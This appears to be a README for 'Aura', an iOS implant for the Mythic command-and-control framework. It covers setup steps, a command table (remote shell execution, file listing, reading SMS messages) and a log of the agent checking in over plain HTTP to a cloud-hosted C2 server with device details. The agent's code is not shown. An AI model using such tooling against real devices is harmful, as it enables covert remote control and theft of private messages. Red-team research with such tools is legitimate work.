Aura is an iOS payload designed to interact with a Mythic C2 (command and control) server and was developed over the 2024 Microsoft Global Hackathon. To fit within the time constraint of one week:
- The agent communicates over plain text HTTP channels
- Mythic will manage and initate the agent builds per-usual, but the actual compilation and configuration of the agent will take place remotely on macOS w/iOS SDK outside of Docker.
- A limited number of commands will be implemented.
- iOS 12
- The Aura agent currently only supports plain-text HTTP comms.
- This is a development build only requiring a macOS build server for iOS compilation.
- Mythic usually requires Agent code be hosted in Docker containers.
- Edit the Mythic environement file:
Mythic/.envto:MYTHIC_SERVER_BIND_LOCALHOST_ONLY="false"RABBITMQ_BIND_LOCALHOST_ONLY="false”- Grab the password for RabbitMQ
- Start Mythic C2 (you'll need to have this already)
- Clone this repository
- Edit
Payload_Type/rabbitmq_config.jsonwith the values from the Mythic server - Run
python Payload_Type/main.py - 🥳 In the Mythic UI you can now build and install Aura!!
| Description | Implemented Command |
|---|---|
| Execute a shell command | shell_exec [args] |
| List a file | ls [args] |
| Read and correlate SMS messages | messages |
| Exit and uninstall the Agent | exit |
2024-09-20 18:13:33.914 aura[2322:270194] 👋 Hello from the Aura iOS agent!
2024-09-20 18:13:33.916 aura[2322:270194] [DEBUG] Check-in URL: http://ec2-54-245-60-126.us-west-2.compute.amazonaws.com:80/agent_message
2024-09-20 18:13:34.027 aura[2322:270194] {
action = checkin;
architecture = arm64;
domain = local;
"external_ip" = "136.24.173.189";
host = "brandontonsipad.localdomain";
"integrity_level" = 2;
ips = (
"192.168.0.18"
);
os = "iOS 12.5.7";
pid = 2322;
"process_name" = aura;
user = mobile;
uuid = "b355bc11-0c78-41ec-b3b7-7220561137fa";
}